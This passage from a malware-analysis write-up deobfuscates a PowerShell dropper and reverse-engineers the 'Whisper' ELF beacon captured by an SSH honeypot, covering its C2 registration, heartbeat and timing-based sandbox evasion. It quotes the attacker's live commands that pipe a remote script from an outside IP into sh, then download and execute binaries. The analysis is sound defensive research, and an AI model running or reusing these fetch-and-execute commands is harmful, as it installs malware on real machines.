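    # larger blob at a fixed offset, as the PowerShell stub does with
    # $Unbefringed.'substring'(4696-1, 3).
    return content[start:start + length]
```

The stub then dot-sources whatever three-character name sits at that offset, passing the whole file content as its argument.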

I also implemented a Python equivalent for this routine; the script is available in the repository.

After running my script, the payload output looks like this:

At first glance the output looks nasty, but it can be disentangled. Don’t panic. I applied line breaks and indentation in the right places to make control flow and function calls visible.

To make the code more readable I used the following commands:

sed -i 's/;\$/;\n\$/g' "$1"
sed -i 's/;Cenogenesis/;\nCenogenesis/g' "$1"
sed -i 's/{/{\n/g' "$1"
sed -i 's/}/\n}\n/g' "$1"
sed -i 's/;function/;\nfunction/g' "$1"
sed -i 's/;while/;\nwhile/g' "$1"

The result now looks much more promising:

There is still some noise embedded in a few places. We also discovered repeated calls to the Roberts function with additional encoded strings. I wrote a Python helper to extract those strings from the file and decode them with the same Roberts / Cashoo logic.

When we run that pipeline and merge the output under the previous deobfuscated view, we obtain the following consolidated result:

Final Script

This is the final deobfuscated dropper script. From it we can conclude the following:

  • The script repeatedly attempts to download a remote file from a suspicious URL and save it locally.
  • Once the file is available, it reads parts of it, Base64-decodes contained data, and reconstructs executable PowerShell code.
  • Finally, it executes that decoded code dynamically (via dot-sourcing / Invoke-Expression style execution).

This is a classic loader / bootstrapper pattern for delivering secondary stages of malware.
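The decode half of that chain can be sketched in Python (all names and the marker are hypothetical; the real dropper is PowerShell, and I deliberately omit the final execution step):

```python
import base64

def reconstruct_stage2(raw: bytes, marker: bytes = b"B64:") -> str:
    # Locate the embedded blob behind a (hypothetical) marker and
    # Base64-decode it into the second-stage source text.
    start = raw.index(marker) + len(marker)
    return base64.b64decode(raw[start:]).decode()

# A real loader would now execute the returned text dynamically
# (Invoke-Expression / dot-sourcing in the PowerShell original).
```

The pattern matters more than the details: the first stage carries no payload itself, only the logic to fetch, reconstruct, and run one.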

There are some formatting glitches in the decompiled output that likely arose during processing, but the overall intent is clear.

The dropper notably points at hxxps[://]zohmailcloud[.]com//cloud/Assholes[.]psm as one of the remote payload locations. I could not retrieve the file (the URL is no longer reachable), but I did find a Twitter post referencing the file with MD5 7a5fe1af036b6dba35695e6d4f5cc80f.

If I manage to acquire the remote artifact later, I will write a dedicated follow-up article with a full 2nd-stage analysis.


Whisper – An Interesting Sandbox Evasion?


In the past few days I found something fairly interesting in my sandbox. An attacker attempted to install malware, and the initial analysis left me somewhat puzzled. The attacker used several techniques to prevent the payload from being delivered to sandboxes. In this post I only show excerpts; I have also published a repository on GitHub that contains the full artifacts.

Quick overview of the key facts:

Affected service: SSH
Honeypot: Cowrie
Attacker IP: 31.170.22.205
Commands executed: (see snippet below)

wget -qO- http://31.170.22.205/dl401 | sh
wget -qO- http://31.170.22.205/dl402 | sh
wget -qO- http://31.170.22.205/dl403 | sh
wget -qO- http://31.170.22.205/dl404 | sh
wget -qO- http://31.170.22.205/dl405 | sh
wget -qO- http://31.170.22.205/dl406 | sh
wget -qO- http://31.170.22.205/dl407 | sh
wget -qO- http://31.170.22.205/dl408 | sh

The attacker tried to download a shell script. It looks like this:

cd /tmp
rm -rf whisper.*
wget http://31.170.22.205/bins/whisper.armv5
chmod +x whisper.armv5
./whisper.armv5 410
cd /tmp
rm -rf whisper.*
wget http://31.170.22.205/bins/whisper.armv6
chmod +x whisper.armv6
./whisper.armv6 410
[...]


The script downloads several binaries, sets execute permissions on them, and then runs them. I tried to download those binaries myself and, oddly, every file had the exact same hash. Inspecting the file metadata revealed they are Windows executables.

I uploaded the file to VirusTotal for a quick look.

The file turned out to be Microsoft’s calc.exe, the standard Windows Calculator app. We can verify this by computing the file hash of calc.exe on a Windows machine:
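For reference, the comparison hash can be computed anywhere with a short, chunked Python helper (not specific to Windows; any known-good calc.exe path works as input):

```python
import hashlib

def sha256_of(path: str) -> str:
    # Hash the file in 64 KiB chunks so large binaries don't need
    # to be loaded into memory at once.
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()
```

Comparing the resulting digest against the hash of the downloaded "whisper" files confirms they are byte-identical to the Calculator binary.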

That gives us confirmation. Since the attacker had already connected to our honeypot, I then attempted to download the files from the honeypot's IP address, which worked as expected. The attacker deliberately prevents their actual payloads from being easily analyzed by serving them only to selected targets.

Here’s a table of the downloaded binaries (click to open)

You can download them for analysis purposes here.

filename                   sha256
whisper.aarch64            5f7dff5b5bdc2a12506cfb771e94b6ea26fec8a78f65cf927f361a39322036f4
whisper.aarch64be          7a2af6f8c55bfc6d0bb259b4df37641cfb0dc9a1c94e0955784cfd9b34dc08ef
whisper.arcle750d          c92038d168aa088997ea982aadf1d455ac4bc89332916a576117273610f3069f
whisper.arclehs38          3611fb87865bd967b6a1b2c3450e68cec14ec90abd9a790147e1544896e7b624
whisper.armv4              58189cbd4e6dc0c7d8e66b6a6f75652fc9f4afc7ce0eba7d67d8c3feb0d5381f
whisper.armv5              1d51c313c929d64c5ebe8a5e89c28ac3e74b75698ded47d1bc1b0660adc12595
whisper.armv6              90bf143a03e0cb6686c32a8a77dbdad6a314a16b7991823f45f7d9cb22ba51bc
whisper.armv7              2679b37532e176d63c48953cb9549d48feb76f076222cb6502034b0f72ca7db1
whisper.i686               326952154ef5a81c819d67f9408e866af5fe2cdb3024df3ef1d650a9932da469
whisper.m68k               0f1fd9f0a99693ec551f7eb93b3247b682cb624211a3b0c9de111a8367745268
whisper.mips               d37b334ec94b56236dc008108d4a9189019f1849fb010dcf08cfcf1a7d199b53
whisper.mips64             1afcdc3210b47356a0f59eeffbc2f7be22c1dd7aa2cc541c0eb20db29da8280e
whisper.mips64le           fa96cf3b0022711627b97d569f0c6e28cfd62e7051fdce3f0165f8dd5c4ec760
whisper.mips64len32        31f781726cc8cfc002b847fc0f05a7e28ebecea95f5a03b1cdeb63cce3e9ed8c
whisper.mips64n32          3615d10d1ef6e57b66aa653b158cd8d57166d69cbc4c90c2b7b9dd29820fcc64
whisper.mipsle             b4658234a5c300bce3fe410a55fc87a59e4be7d46f948eaff389c4c16016afaa
whisper.powerpc440fp       ff08d2c7f8b5679add11dd4a297dd40a0d597e92e307ccd9c0d36366b59e3c6f
whisper.powerpc64e5500     af7893318f1fe0d60cff62dbebe434e5f8c42bf1b338db23858177e880894574
whisper.powerpc64e6500     7234970698fab486e210a65aa2a3d3daebd3eebcf4bf016e9670fa725c07d76a
whisper.powerpc64lepower8  90f5ccd40e0f737eb40dcf292f202c7c70f1cdc2d33bd6718c0b286007f3ce24
whisper.powerpc64power8    938205ed2f664fc330e20580799445182ba840672ef8bd75ae7629e07a460a79
whisper.powerpce300c3      b2b811bbfe06d0edba85e0b0d42dbffb3714dee5bdd44426a1cb4589874d3234
whisper.powerpce500mc      c43f32a066112fd87f43895515d27116e40688ae47b02ce0a5b379672830a136
whisper.riscv32            61db3883d792b518450a4a67cfaa4d14baec59239a967ffb30c7a116a39f00e6
whisper.riscv64            1a60918639c961f6814f4dc74751a926361841b66c837d544697be1d3f42594e
whisper.sh4                3ac847bc1351ea5275d30cf9186caf607021d7f1da1a4cafeff6886b87844f36
whisper.sparc              9033caaa07477bbed8ccd9f130fd8353a81143db44555b734ed1547ef368a8dd
whisper.sparc64            00a290ee2458e38a0ec78be1414f651612c51831ff741cb40d5c6a11b29a6d7c
whisper.x64                4dd0005c6e6d4eca722ed02fec17a689828754a66a107272c5cd62f2fec478e1

For my analysis I’ll focus on the file whisper.x64.


It’s a stripped ELF binary, i.e. one whose debugging symbols and symbol names have been removed. That makes analysis a bit harder, but not impossible. First step: upload the file to VirusTotal.

This was the first submission of the file on VirusTotal, so there is no historical data. Several scanners flagged the binary as a DDoS agent. To find out what it actually does at runtime, I opened it in Ghidra and started looking at functions. First I checked the strings embedded in the binary.


Already we can see some interesting strings, for example:

  0040a000  "31.170.22.205"
  0040a012  "/add.php?v=%u&a=%s&o=%u&e=%u"
  0040a050  "/ping.php?v=%u&a=%s&e=%u&c=%u"

From these strings we can infer a few capabilities:

  • add.php: registers the client at the C2 server
  • ping.php: sends a ping / heartbeat to the C2 server

Next I examine syscalls to get a clearer picture of the binary’s behavior.
If you want to get an overview of x64 syscalls, you can find them here.

0x31 is the syscall number for sys_bind, so we can infer socket-related functionality. I renamed the function to socket_bind in Ghidra (right-click > Rename Function) and then checked the incoming calls to see where it is used.

After jumping to function FUN_004012b1 we see the following code:

To bind a socket via syscall we need to look at the sockaddr_in layout for x64:

struct sockaddr_in {
    short            sin_family;   // e.g. AF_INET
    unsigned short   sin_port;     // e.g. htons(3490)
    struct in_addr   sin_addr;     // see struct in_addr, below
    char             sin_zero[8];  // zero this if you want to
};

Offset 0 (2 bytes): sin_family (2 / AF_INET)
Offset 2 (2 bytes): sin_port – this is where param_1 lands
Offset 4 (4 bytes): sin_addr – here it’s 0 (INADDR_ANY)

So local_28 corresponds to sin_family, local_24 to sin_addr, and local_26 to sin_port. I renamed the variables accordingly and gave the function the name create_socket.
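For reference, that layout can be packed in Python (illustrative only; AF_INET = 2, port 3490 taken from the struct comment above, and INADDR_ANY for the address):

```python
import struct

AF_INET = 2

def make_sockaddr_in(port: int, addr: int = 0) -> bytes:
    # sin_family is stored in host byte order ("<H"), while sin_port and
    # sin_addr are network byte order (">H" / ">I"), followed by the
    # 8-byte sin_zero padding. Total size: 16 bytes.
    return (struct.pack("<H", AF_INET)
            + struct.pack(">H", port)
            + struct.pack(">I", addr)
            + b"\x00" * 8)

sa = make_sockaddr_in(3490)
# bytes 0-1: family, bytes 2-3: port, bytes 4-7: addr (INADDR_ANY)
```

Laying the structure out like this makes it easy to see why local_26 (offset 2) must be the port and local_24 (offset 4) the address.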

FUN_004036d3 likely creates the socket. We can confirm that by searching inside it for syscall 0x29 (sys_socket). That matches, so I renamed this function as well and completed the code as far as possible.

We still didn’t know which port this socket uses, so I looked at incoming references and found it’s called only from FUN_00401020.

That function is invoked right after the entry point; it’s effectively main. From the line iVar2 = create_socket(0x5d15); we can infer the port. The 0x5d15 in the binary is not the final port number: it’s an unsigned short that gets converted with htons from host byte order to network byte order.

whisper > printf "%d\n" $(( ((0x5d15 & 0xff) << 8) | ((0x5d15 >> 8) & 0xff) ))
5469

You can convert it in bash or compute it by hand: because htons swaps the two bytes on little-endian hosts, 0x5d15 becomes 0x155d, which is 5469 in decimal. Binding a local port like this is a common pattern used, for example, to avoid running two copies of the malware, but it could also serve as a communication channel. To check that, I searched for the sys_listen syscall (0x32). There is no listen syscall in the binary, so it’s safe to assume this is an execution lock rather than a listening server. The decompiled code also confirms this.
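The same 16-bit byte swap in Python, as a small helper independent of the host's endianness:

```python
def byteswap16(v: int) -> int:
    # Swap the two bytes of a 16-bit value, mirroring what htons
    # does on a little-endian host: 0x5d15 -> 0x155d.
    return ((v & 0xFF) << 8) | ((v >> 8) & 0xFF)

byteswap16(0x5D15)  # 0x155D == 5469
```

The swap is its own inverse, so the same helper converts in both directions.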

iVar2 is the return status of the socket creation; if iVar2 == -1 socket creation failed and the program exits.

Now let’s look more closely at the block of code that follows a successful socket creation. I’ll skip FUN_0040123 and FUN_00401246 because they only initialize and destroy a buffer; they don’t add relevant functionality.

To understand the logic I examined four helper functions: FUN_0040120a, FUN_004013c6, FUN_004014e2, and FUN_00404634. I started with FUN_00404634 because it has the most incoming references.

This one is most likely a sleep function. If param_1 == 0, nothing happens; that’s typical for sleep wrappers. If param_1 != 0, the routine calls into the kernel through several helper calls and performs a timed wait.

Inside, it calls FUN_00404f1f(0x11, 0, local_28), which is a wrapper for a syscall. The parameter 0x11 is the syscall selector we care about; the behavior matches sys_rt_sigtimedwait. rt_sigtimedwait lets you wait for signals with a timeout, so the code can sleep while still being able to respond to signals (from another thread, IPC, or a realtime signal). Many analysis and monitoring tools hook libc sleep functions like nanosleep(); by using direct syscalls the malware can bypass those hooks and make runtime analysis harder.

After that the code performs what looks like a timer or remaining-time check, it computes elapsed time or remaining time and returns that value. I renamed this helper to sleep for clarity.


FUN_0040120a

FUN_0040120a uses syscall 0xc9, which is a time-related syscall. The function measures elapsed time across a 10-second delay, a typical sandbox-evasion trick. The code checks the difference and only executes the following block if the delta indicates the sleep actually occurred. I renamed this to time_passed_check.
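A rough Python analogue of that check (illustrative only; the real code measures time via syscall 0xc9 and sleeps via the rt_sigtimedwait wrapper, and the tolerance factor here is my assumption):

```python
import time

def time_passed_check(sleep_fn, clock, expected: float = 10.0) -> bool:
    # Returns True only if roughly `expected` seconds really elapsed
    # across the sleep. A sandbox that fast-forwards sleeps produces a
    # delta that is too small, so the check fails and the payload path
    # is never taken.
    start = clock()
    sleep_fn(expected)
    return clock() - start >= expected * 0.9

# Real usage would be: time_passed_check(time.sleep, time.monotonic)
```

Injecting the sleep and clock functions here is just for testability; the malware obviously hardcodes both.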


FUN_004013c6

FUN_004013c6 is straightforward: it performs a GET request to the C2’s add.php. That is the client registration step. The GET parameters v, a, o, and e map roughly as follows:

  • v: fixed value
  • a: CPU architecture (agent string)
  • o: fixed value
  • e: the value passed to the binary at execution time

I renamed the function to add_client.


FUN_004014e2

The last function, FUN_004014e2, is similar to add_client. It sends a ping to the C2 server and returns a boolean indicating success or failure. I renamed it ping_cnc.

I’ve now analyzed and named all four helper functions used by FUN_0040125c.
Here’s the result:

Step-by-step:

First, the binary checks the result of the time-check. If that check passes, it registers the client with the C2.

Afterwards, the binary pings the C2 server every 300 seconds. The loop contains a counter that runs 576 iterations in total. The full runtime is therefore limited to exactly 48 hours (300 * 576 = 172,800 seconds = 48 hours). I named the overall routine add_and_ping.
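The renamed routine can be sketched as follows (a hypothetical reconstruction based on the decompiled structure; function names are mine):

```python
def add_and_ping(register, ping, sleep_fn,
                 interval: int = 300, iterations: int = 576) -> None:
    # Register once with the C2, then beacon every `interval` seconds.
    # 300 s * 576 iterations = 172,800 s = exactly 48 hours of runtime.
    register()
    for _ in range(iterations):
        ping()
        sleep_fn(interval)
```

The fixed iteration count is what bounds the sample's lifetime: after the 576th ping it simply exits.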

Looking into the main function, we now have a structure that ties everything together:

Note: I intentionally didn’t discuss every single helper; I renamed the lesser functions for clarity but didn’t dig into those that aren’t relevant to this write-up.


Conclusion

The binary’s functionality is limited. On startup it runs a time-difference check designed to detect sandboxing, using sys_rt_sigtimedwait to make sleep detection harder. If the sample concludes the timing check is okay, it registers with the C2 and then pings the C2 every five minutes for 48 hours. This is a beacon-only sample with no additional backdoor capabilities in the analyzed build.

Interpretations

Because the attacker used multiple techniques to keep their real binaries out of standard analysis, this likely serves as a sandbox-evasion measure. The operator can watch the incoming pings from infected machines and, after confirming persistent, consistent check-ins over the 48-hour window, choose targets for a follow-up payload deployment. That prevents premature sandboxing and analysis of the actual payloads.

An argument against that theory is the lack of any attempt to establish persistent access in this sample; that would make later deployment harder if defenders notice and block the operation early.

Another hypothesis is that the operator collects telemetry to detect whether the binary is being detected and if it survives for a desired runtime. That would explain the lack of persistence attempts, but I consider this less likely because there are more efficient ways to perform that kind of telemetry.

References: